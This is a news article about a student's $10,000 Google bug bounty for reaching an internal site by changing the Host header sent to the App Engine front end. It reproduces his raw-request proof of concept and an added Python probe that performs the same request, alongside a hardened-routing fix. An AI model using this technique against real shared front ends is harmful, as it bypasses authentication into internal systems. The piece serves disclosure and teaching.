This week, Ezequiel Pereira said in a blog post that he went bug hunting on July 11 simply out of boredom and, after several failed attempts, stumbled upon a way to reach internal Google sites without authenticating: by changing the Host header in requests sent to the App Engine front end.
Most of his attempts to change the header -- in order to reach internal apps on *.googleplex.com, which normally require authenticating through the Google MOMA login page -- failed, returning 404 Not Found errors or running into other access controls.
However, while testing with Burp Suite, the student came across one site that did allow unauthenticated access: yaqs.googleplex.com.
The web server did not check Pereira's credentials and redirected him to "/eng", which in turn exposed links to various sections of Google services and infrastructure, alongside a footer note reading "Google Confidential".
That was proof enough, and rather than poke around further, the student "reported the issue right away" with proof-of-concept (PoC) evidence.
The PoC sent to Google, reproduced below, uses Burp Suite's Repeater:
Go to the Repeater tab
Set the target host to "www.appspot.com", the target port to "443", and check the "Use HTTPS" option
Write this raw HTTP request (including the last two empty lines):
    GET /eng HTTP/1.1
    Host: yaqs.googleplex.com


Attack scenario: Anyone can access an internal Google website called YAQS that says "Google Confidential" in the footer.
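The Repeater steps above are the whole trick: the TLS connection (and SNI) goes to the public App Engine front end, while the Host header names an internal site, and the front end routes on the Host header alone. As an added example that is not part of Pereira's post or of Google's code, the Python below rebuilds that request by hand, parses the kind of redirect the student saw, and shows a toy front-end router in the weak form (route to any known backend named in the Host header) beside a hardened form that only routes hosts the public front end is meant to serve. The hostnames other than the two in the article, the backend table and SAMPLE_RESPONSE are constructed for illustration.

```python
# Added example, not code from Pereira's post or from Google. Hostnames other
# than www.appspot.com and yaqs.googleplex.com, the BACKENDS table and
# SAMPLE_RESPONSE are constructed for illustration.
import socket
import ssl
from typing import Optional, Tuple


def build_request(path: str, host_header: str) -> bytes:
    """Raw HTTP/1.1 request whose Host header is chosen independently of the
    server we connect to: TLS goes to the front end, Host names another site."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_status(response: bytes) -> Tuple[int, str]:
    """Return (status code, Location header or '') from a raw HTTP response."""
    head = response.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    location = ""
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"location":
            location = value.strip().decode("latin-1")
    return status, location


# Constructed stand-in for the response the article describes: a redirect to
# /eng with no authentication challenge.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /eng\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def probe(frontend: str, host_header: str, path: str = "/",
          port: int = 443, timeout: float = 10.0) -> Tuple[int, str]:
    """Live equivalent of the Burp Repeater steps: TLS (and SNI) to `frontend`,
    Host header set to `host_header`. This is a network call; run it only
    against systems you are authorised to test."""
    ctx = ssl.create_default_context()
    with socket.create_connection((frontend, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=frontend) as tls:
            tls.sendall(build_request(path, host_header))
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return parse_status(b"".join(chunks))


# Hypothetical routing table for a shared front end (constructed).
BACKENDS = {
    "www.appspot.com": "appspot-frontpage",
    "myapp.appspot.com": "tenant-myapp",
    "yaqs.googleplex.com": "internal-yaqs",  # internal app behind the same front end
}
PUBLIC_SUFFIXES = (".appspot.com",)


def route_naive(host_header: str) -> Optional[str]:
    """Weak: any backend the front end knows about is reachable by naming it in
    the client-controlled Host header, internal ones included."""
    return BACKENDS.get(host_header.lower().split(":")[0])


def route_hardened(host_header: str) -> Optional[str]:
    """Fixed: the public front end only routes hosts it is meant to serve and
    refuses the rest (the caller answers 404) instead of forwarding to an
    internal backend that assumes its callers were already authenticated."""
    host = host_header.lower().split(":")[0]
    if not host.endswith(PUBLIC_SUFFIXES):
        return None
    return BACKENDS.get(host)


if __name__ == "__main__":
    print(build_request("/eng", "yaqs.googleplex.com").decode())
    print(parse_status(SAMPLE_RESPONSE))
    print(route_naive("yaqs.googleplex.com"), route_hardened("yaqs.googleplex.com"))
```

The front-end allowlist is only half of the fix a practitioner would want: an internal application should also enforce authentication itself rather than assume that every request reaching it has already passed the login page, so that a routing mistake elsewhere does not become an authentication bypass.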
A few hours later, Google's security team responded.
"I thought to myself, 'Cool, this is probably a small thing that isn't worth a dime; the website probably had some technical stuff about Google servers and nothing really important,'" the student commented. "I don't know what the website contain[ed], but some weeks later I got an email right after getting out of school that said my report was worth much more than a dime."
Several weeks later, Google's team had triaged and fixed the issue, and it turned out to be worth a bug bounty reward of $10,000: working from Pereira's report, the team found variants of the issue that would have let an attacker access sensitive data.
Bugs like this still turn up on occasion, but in general Google has raised payouts for high-severity vulnerabilities through its bug bounty program. A remote code execution (RCE) report can now earn researchers over $30,000, as such bugs are becoming scarcer and harder to find.